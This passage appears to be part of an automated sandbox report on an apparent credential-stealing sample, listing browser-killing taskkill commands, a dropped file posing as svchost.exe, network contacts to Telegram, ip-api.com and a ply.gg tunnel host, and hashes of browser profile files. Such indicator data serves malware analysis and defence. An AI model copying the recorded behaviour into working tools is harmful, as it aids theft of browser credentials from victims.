"cmd.exe" /c taskkill /F /IM opera.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 moonreborn.com udp
US 172.67.133.17:443 moonreborn.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
BE 88.221.83.187:443 www.bing.com tcp
BE 88.221.83.187:443 www.bing.com tcp
BE 2.17.107.130:443 r.bing.com tcp
BE 2.17.107.130:443 r.bing.com tcp
BE 88.221.83.226:443 th.bing.com tcp
BE 88.221.83.226:443 th.bing.com tcp
IE 20.190.159.2:443 login.microsoftonline.com tcp
US 13.107.5.80:443 services.bingapis.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 140.82.112.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.216:443 codeload.github.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
GB 2.18.66.75:443 tcp
IE 20.50.73.4:443 browser.pipe.aria.microsoft.com tcp
US 8.8.8.8:53 r.bing.com udp
BE 88.221.83.186:443 r.bing.com tcp
BE 88.221.83.186:443 r.bing.com tcp
BE 88.221.83.186:443 r.bing.com tcp
US 8.8.8.8:53 186.83.221.88.in-addr.arpa udp
BE 88.221.83.186:443 r.bing.com tcp
BE 88.221.83.186:443 r.bing.com tcp
BE 88.221.83.186:443 r.bing.com tcp
US 8.8.8.8:53 teams-ring.msedge.net udp
US 52.113.196.254:443 teams-ring.msedge.net tcp
US 8.8.8.8:53 roxy.azurefd.net udp
US 104.212.67.120:443 roxy.azurefd.net tcp
US 8.8.8.8:53 254.196.113.52.in-addr.arpa udp
US 8.8.8.8:53 120.67.212.104.in-addr.arpa udp
N/A 127.0.0.1:8000 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
GB 142.250.179.227:443 ssl.gstatic.com tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 mail.google.com udp
GB 172.217.16.229:443 mail.google.com tcp
GB 172.217.16.229:443 mail.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
BE 74.125.206.84:443 accounts.google.com tcp
US 8.8.8.8:53 229.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 84.206.125.74.in-addr.arpa udp
BE 74.125.206.84:443 accounts.google.com udp
GB 216.58.213.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 10.213.58.216.in-addr.arpa udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
N/A 10.127.0.168:5900 tcp
NL 149.154.167.220:443 api.telegram.org tcp
BE 74.125.206.84:443 accounts.google.com udp
BE 74.125.206.84:443 accounts.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.16.229:443 mail.google.com tcp
US 192.178.49.163:443 beacons.gcp.gvt2.com tcp
BE 74.125.206.84:443 accounts.google.com tcp
GB 142.250.178.4:443 www.google.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 216.239.32.116:443 beacons4.gvt2.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 116.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 163.49.178.192.in-addr.arpa udp
N/A 127.0.0.1:5900 tcp
US 192.178.49.163:443 beacons.gcp.gvt2.com udp
BE 74.125.206.84:443 accounts.google.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
GB 216.58.213.3:443 beacons3.gvt2.com tcp
GB 216.58.213.3:443 beacons3.gvt2.com udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 85.177.190.20.in-addr.arpa udp
BE 88.221.83.200:443 www.bing.com tcp
US 8.8.8.8:53 200.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
BE 88.221.83.200:443 r.bing.com tcp
BE 88.221.83.200:443 r.bing.com tcp
BE 2.17.107.107:443 r.bing.com tcp
BE 2.17.107.107:443 r.bing.com tcp
US 8.8.8.8:53 107.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 185.199.110.154:443 github.githubassets.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.108.133:443 repository-images.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.114.21:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 21.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 167.154.64.172.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 codeload.github.com udp
GB 20.26.156.216:443 codeload.github.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 full-wet.at.ply.gg udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 185.199.110.154:443 github.githubassets.com tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.210:443 api.github.com tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 r.bing.com udp
BE 88.221.83.201:443 r.bing.com tcp
BE 88.221.83.185:443 r.bing.com tcp
US 8.8.8.8:53 201.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 185.83.221.88.in-addr.arpa udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8000 tcp
BE 88.221.83.248:443 th.bing.com tcp
BE 88.221.83.201:443 r.bing.com tcp
BE 88.221.83.248:443 www.bing.com tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 github.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
BE 88.221.83.248:443 www.bing.com tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 camo.githubusercontent.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
GB 20.26.156.216:443 codeload.github.com tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 full-wet.at.ply.gg udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
US 8.8.8.8:53 codeload.github.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 telegram.org udp
US 8.8.8.8:53 cdn4.cdn-telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.35.152:443 cdn4.cdn-telegram.org tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 152.35.111.34.in-addr.arpa udp
NL 149.154.167.99:443 telegram.org tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
N/A 127.0.0.1:8000 tcp
BE 88.221.83.219:443 www.bing.com tcp
US 8.8.8.8:53 219.83.221.88.in-addr.arpa udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8000 tcp
PL 195.3.223.234:80 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 mega.nz udp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
LU 66.203.125.13:443 g.api.mega.co.nz tcp
LU 66.203.125.13:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 11.127.203.66.in-addr.arpa udp
N/A 127.0.0.1:8000 tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 codeload.github.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.213.14:443 www.youtube.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 spotlights-feed.github.com udp
US 185.199.108.153:443 spotlights-feed.github.com tcp
GB 216.58.213.14:443 www.youtube.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 172.217.169.34:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 153.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
BE 74.125.206.84:443 accounts.google.com udp
GB 172.217.169.34:443 googleads.g.doubleclick.net udp
GB 142.250.200.42:443 jnn-pa.googleapis.com tcp
GB 142.250.178.4:443 www.google.com tcp
GB 142.250.187.225:443 yt3.ggpht.com tcp
GB 142.250.200.42:443 jnn-pa.googleapis.com tcp
GB 142.250.178.4:443 www.google.com tcp
GB 142.250.200.42:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 34.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.180.250.142.in-addr.arpa udp
GB 142.250.179.230:443 static.doubleclick.net tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 exmple.com udp
US 67.210.233.131:80 exmple.com tcp
US 8.8.8.8:53 131.233.210.67.in-addr.arpa udp
US 8.8.8.8:53 full-wet.at.ply.gg udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 github.com udp
US 151.101.2.49:443 bazaar.abuse.ch tcp
US 151.101.2.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 8.169.217.172.in-addr.arpa udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
NL 149.154.167.99:443 oauth.tg.dev tcp
NL 149.154.167.99:443 oauth.tg.dev tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
NL 149.154.167.99:443 oauth.tg.dev tcp
NL 149.154.167.99:443 oauth.tg.dev tcp
US 8.8.8.8:53 175.108.111.34.in-addr.arpa udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
BE 74.125.206.84:443 accounts.google.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 codeload.github.com udp
GB 20.26.156.216:443 codeload.github.com tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.215:443 github.com tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
BE 88.221.83.218:443 www.bing.com tcp
BE 88.221.83.218:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 218.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 239.255.255.250:3702 udp
N/A 239.255.255.250:3702 udp
US 8.8.8.8:53 c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
BE 74.125.206.84:443 accounts.google.com udp
N/A 127.0.0.1:8001 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
N/A 127.0.0.1:8001 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:8001 tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:8001 tcp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:8001 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:8001 tcp
N/A 127.0.0.1:8001 tcp
US 8.8.8.8:53 full-wet.at.ply.gg udp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
US 67.210.233.131:80 exmple.com tcp
N/A 127.0.0.1:8000 tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp
PL 209.25.141.180:38848 full-wet.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ec7568123e3bee98a389e115698dffeb
SHA1 1542627dbcbaf7d93fcadb771191f18c2248238c
SHA256 5b5e61fe004e83477411dd2b6194e90591d36f2f145cc3b4faa20cf7ae266a75
SHA512 4a53fbbd7281a1a391f0040f6ff5515cedf6e1f97f2dae4ab495b4f76eb4f929dcda6b347f9bf7f66a899330f8897e1ed117314945d1de27b035cc170fa447d3

\??\pipe\LOCAL\crashpad_1408_SIDRGULCYXCELXON

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a2b2c93b0e0147ba3bfab6787e75531c
SHA1 b86a016830cc79f79ce376c89589d958a1329f33
SHA256 017cabb371c7f86916a3a14b90d0044572d52134f3c2656f4c272a390c228df3
SHA512 9b191f6cc7fe209861eb34312baa0cf3103518d217faaccc3eeaf2a98ee9b9ead8f9c55a2567ed30c3f3bf899df034a4fdf1b42d57d1ffd4acd347dae563d0de

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip

MD5 7ab279d65fc88039691b88f55418c01e
SHA1 832945bca7b88ed4c71fdb41aaad4d3964a4d8ec
SHA256 d12c8945721b71c972cb2f6180b768180a80419f113ab3f92fdfa640ba6d626d
SHA512 3af409ed630dd2d625a8b15c8afb72bc610a94590dc7bd57fd059ab555504faf8eb441b5d452eb7ceb73b3db72ca17ea8986c3ec9f75deafb409636b32bb70d0

C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5bbe7d5788b88b62263ebf7fcc22dcb8
SHA1 afb4b515dc959d322ed3d72153cb508f5735d0e0
SHA256 007b0e7fa12c49e634d1bc0f2b3517236010cdfbea8acfe419d59c3677ac0584
SHA512 eabddf79d9d81cca00ea9a751525e0f074f35abb219ed564bf76946d35e4d684ae1c84c98e0db208558c9a78972f778faee46bd4940557d78bb15063c191facf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e6857d0b7028739ffa41e90722129e8
SHA1 f858e879eb0fd16492778e1b21f4ae91eeb8cdce
SHA256 82a3d3a88c014536d5e55427e7cebe1c2f26c16a03b96680cbcd543f9dec4322
SHA512 1e626e56c925054c984484b37e272b515b1aeccad31b2f6b409160f0820fed6840ed493dda42392094de5a64dd88a30483ba0d53fbe148be84d7587d6ca0e521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 0ba15f72ffb0a37243558588d3e78221
SHA1 814bdfffd723f7de9f8d6d6a0bc8d85a9f275cc0
